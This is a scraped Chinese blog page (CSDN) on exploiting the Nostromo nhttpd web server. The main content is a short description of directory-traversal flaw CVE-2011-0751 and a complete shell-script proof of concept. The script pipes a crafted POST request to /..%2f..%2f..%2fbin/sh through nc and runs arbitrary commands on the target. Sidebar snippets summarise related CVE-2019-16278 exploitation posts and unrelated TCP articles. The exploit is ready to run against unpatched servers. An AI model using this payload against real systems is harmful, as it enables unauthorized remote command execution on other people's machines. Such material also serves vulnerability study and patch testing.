Nostromo nhttpd系列漏洞利用以及总结

最新推荐文章于 2024-01-16 18:21:49 发布
最新推荐文章于 2024-01-16 18:21:49 发布
阅读量1.6k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41832837/article/details/109247859
版权

前言:

Nostromo nhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。

 

Nostromo 目录遍历(CVE-2011-0751)

漏洞详情:

1.9.4之前版本中存在目录遍历漏洞。远程攻击者可以借助URI中的“..%2f”执行任意程序或者读取任意文件。

影响版本:

versions <= 1.9.4

POC:

#!/bin/sh

if [ $# -lt 3 ]; then

    echo "Usage: $(basename $0) HOST PORT COMMAND..."

    exit 2

fi


HOST="$1"

PORT="$2"

shift 2


( \

    echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \

    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \

    echo "$@ 2>&1" \

) | nc "$HOST" "$PORT" \

  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'
最低0.47元/天 解锁文章
「已注销」
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-16278:Nostromo Web服务器的远程命令执行
NOSEC2019的博客
10-22 2597
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/...
单台服务器最大支持多少连接数
热门推荐
wangpeng322的博客
08-20 1万+
在性能测试过程中,经常会接触到链接数相关的问题,有一个问题曾经困扰我好长时间,那就是一台服务器最多能支持多少链接数呢? 有的朋友可能会说是65535,因为操作系统有65535个端口,那么这个答案准确吗? 首先先了解下如何标识一个链接(记住下面的概念,文章后面要用到),操作系统是通过一个四元组来标识一个TCP链接: {本地ip,本地port,远程ip,远程port} 这四个要素唯一确定一个T...
tcp服务器支持最大连接数,tcp服务器支持多客户端连接数
weixin_42500866的博客
07-29 263
弹性云服务器 ECS弹性云服务器(Elastic Cloud Server)是一种可随时自助获取、可弹性伸缩的云服务器,帮助用户打造可靠、安全、灵活、高效的应用环境,确保服务持久稳定运行,提升运维效率三年低至5折,多种配置可选了解详情用户数据注入||https://support.huaweicloud.com/usermanual-ecs/zh-cn_topic_0032380449.html,...
浏览器对同一 Host 建立 TCP 连接到的数量有没有限制
qq_49641239的博客
06-24 1857
若在 HTTP/1.1 时代,那个时候没有多路传输,当浏览器拿到一个有几十张图片的网页该怎 么办呢?肯定不能只开一个 TCP 连接顺序下载,那样用户肯定等的很难受,但是如果每个图片都开一个 TCP 连接发 HTTP 请求,那电脑或者服务器都可能受不了,要是有 1000 张图片的话总不能开 1000个TCP 连接吧,你的电脑同意 NAT 也不一定会同意。 有。Chrome 最多允许对同一个 Host 建立六个 TCP 连接。不同的浏览器有一些区别。 如果图片都是 HTTPS 连接并且在同一个域名下,那么浏览器
TCP打开端口数和打开连接数限制系列文章
Raphaelliu的专栏
02-10 1697
The TIME-WAIT state in TCP and Its Effect on Busy Servershttp://www.isi.edu/touch/pubs/infocomm99/infocomm99-web/TCP/IP 选项TcpTimedWaitDelay设置http://www.cnblogs.com/shanyou/archive/2008/12/19/1358267.htmlTCP - WAIT状态及其对繁忙的服务器的影响http://www.cnblogs.com/shanyo
websocket 发送的消息超过默认限制就会自动断开连接
飞乐鸟的博客
07-03 2610
配置org.apache.tomcat.websocket.textBufferSize、org.apache.tomcat.websocket.binaryBufferSize 的值为50M,再进行尝试,success!添加Websocket监听类。
Nostromo
10-25
这个压缩包文件包含了一系列与"Nostromo"字体相关的文件,让我们来深入了解一下这个字体家族及其特点。 1. **Nostromo字体家族**: Nostromo字体以其独特的风格和视觉效果而闻名,它可能是基于科幻元素或者复古...
nostromo:用于构建功能强大的别名的CLI
01-31
它用于查找和执行实际命令以及交换所有替换内容以简化调用。 nostromo可以帮助您以声明的方式构建复杂的工具。 工具通常允许您运行似乎很容易使用的多级命令,例如git rebase master branch或docker rmi b750fe...
nostromo-cli:Nostromo CLI
05-25
./nostromo 您应该看到可用命令的列表。 在第一个版本中,我们提供了用于管理卡片和项目的简单命令。 第2步-设置API令牌 下一步是填写您的个​​人API令牌。 您可以在用户设置页面中找到此令牌。 之后, .env文件的...
Nostromo:Nostromo Quicksilver界面
05-17
我喜欢BezelHUD的外观,但是我从来没有觉得方形接口可以很好地用于较长的名称/字符串(我经常遇到)。 底漆对此很好用,但是看起来并不好。 我还感觉到很多接口都是在1440x900被认为是大尺寸的情况下设计的。...
nostromo:BLDC ESC固件(GPLv3.0)
01-31
nostromo固件提供了高级功能,如遥测(telemetry)、PWM控制、DShot及DShot300等高速通讯协议,以及多种滤波技术,包括中值滤波器(median-filter)、卡尔曼滤波器(kalman filter)和梯形滤波(trapezoidal-...
vulfocus靶场通关(目录遍历)
信安是不可或缺的一部分!
01-31 2164
该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。受影响的版本为 8.5.14 之前的版本、8.13.6 之前的 8.6.0 版本以及 8.16.1 之前的 8.14.0 版本。uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…
CVE-2019-16278-Nostromo Web Server远程代码执行
17bdw的编程备份笔记
12-17 162
本文主题主要是分析CVE-2019-16278漏洞原因、漏洞如何利用以及为什么会受到攻击。这个CVENostromo Web服务器(又名nhttpd)有关,这个组件是在FreeBSD,OpenBSD等Unix系统上非常流行的开源Web服务器。 Nostromo无法验证URL,导致可以通过路径遍历系统中的任何文件。没有通过身份验证的攻击者可以强制服务器指向/bin/sh之类的shell文件并执行...
Vulfocus练习之Nostromo nhttpd远程命令执行(CVE-2019-16278)
weixin_45701865的博客
12-12 824
nostromo远程命令执行(CVE-2019-16278)
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自复现
qq_42430287的博客
12-19 584
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自复现
漏洞复现----2、Nostromo Web服务器远程命令执行(CVE-2019-16278)
七天
12-02 2206
文章目录一、漏洞背景二、漏洞原理三、漏洞复现 一、漏洞背景 Nostromo web(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。 在CVE-2011-0751中攻击者可以通过/..%2f..%2f..%2fbin/sh来实现路径穿越,而
文件描述符
upupday19的博客
01-08 1995
最近在做TCP/IP传输相关项目,对于socket文件描述符的取值范围和分配进行了探索。 在系统头文件posix_types.h中定义了文件描述符的最大数量1024,意味着文件描述符的取值范围是0~1023,并且0、1、2已经被分配了,0表示标准输入,1表示标准输出,2表示标准错误输出,而通过socket()分配的socket文件描述符的取值范围是从3~1023的。普通文件描述符和socket文...
入侵防御漏洞复现(二)
szdx1043的博客
01-16 405
Nostromo由于在验证URL安全性方面存在,导致目录穿越,任何人都可以系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。
(环境搭建+复现)CVE-2019-16278 Nostromo Web服务器的远程命令执行
daxi0ng的博客
03-13 1691
【CNVD编号】 CVE-2019-16278 【漏洞名称】 Nostromo Web服务器的远程命令执行 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的...
分包合同计量单.docx
最新发布
07-13
分包合同计量单.docx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值